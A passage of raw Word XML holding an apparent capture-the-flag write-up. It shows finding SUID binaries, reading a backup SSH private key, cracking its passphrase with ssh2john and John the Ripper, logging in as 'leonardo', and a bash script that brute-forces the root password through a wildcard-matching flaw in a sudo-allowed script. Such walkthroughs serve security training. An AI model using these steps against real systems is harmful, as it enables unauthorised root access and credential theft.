      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="144"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943600" cy="1701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used the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command to identify binaries with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">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4">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2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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74800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="125"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943600" cy="1574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identified that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary had the SUID bit enabled, allowing it to execute with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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92200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="126"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943600" cy="1092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root access, it was possible to read the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/id_rsa.bk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains a backup private key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="127"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5943600" cy="1765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E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E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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="128"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E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Additionally, by reading the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa.pub</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified the existence of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">leonardo</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E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E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71500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="129"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5943600" cy="571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E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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> key was password-protected, it was necessary to convert it into a format compatible with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility in order to crack the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">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E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ssh2john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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">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john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--wordlist=~/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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E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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="130"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943600" cy="1993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E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we attempted authentication using the obtained private key and the previously identified user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">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1">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leonardo@&lt;machine-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">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56238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="131"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5943600" cy="35562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User flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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14400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="132"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943600" cy="914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user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">leonardo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has permission to execute the following binaries as root:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/bash/usr/bin/safe</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F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B">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C">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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">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F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01700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="133"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5943600" cy="901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0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safe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file contains a Bash script that implements password verification. It reads the contents of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/senha</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and prompts the user for a secret input. If the provided value matches the file contents, the script displays the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/segredo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; otherwise, it informs that the password is incorrect. To exploit this functionality, we created a script to automate exploitation of the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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0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18138"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="134" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="35181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0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 developed exploit for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">safe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> script vulnerability, it was possible to obtain the root user password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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MhmziuaQnEBWwwRBNhvwrZkQeTwgNlgcITUa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">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#!/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">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9">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characters</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">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chars=({a..z}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0B">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C">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prefix=""</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">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max_length=50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Maximum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infinite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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">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F">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$max_length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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">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found=false</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">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'$prefix'"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">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3">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wildcard)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">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result=$(echo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/usr/bin/bash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/usr/bin/safe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2&gt;&amp;1)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">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7">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sdt>
        <w:sdtPr>
          <w:id w:val="-2088491580"/>
          <w:tag w:val="goog_rdk_0"/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Nova Mono" w:cs="Nova Mono" w:eastAsia="Nova Mono" w:hAnsi="Nova Mono"/>
              <w:color w:val="188038"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">"[√]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>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$prefix"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">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9">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">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exit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11B">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fi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">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D">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">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attempt="${prefix}${c}*"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">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hanging</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">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result=$(echo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/usr/bin/bash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/usr/bin/safe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2&gt;&amp;1)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">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t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">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prefix+="$c"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">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$prefix"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">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found=true</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">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break</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">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fi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">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A">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">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$prefix"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
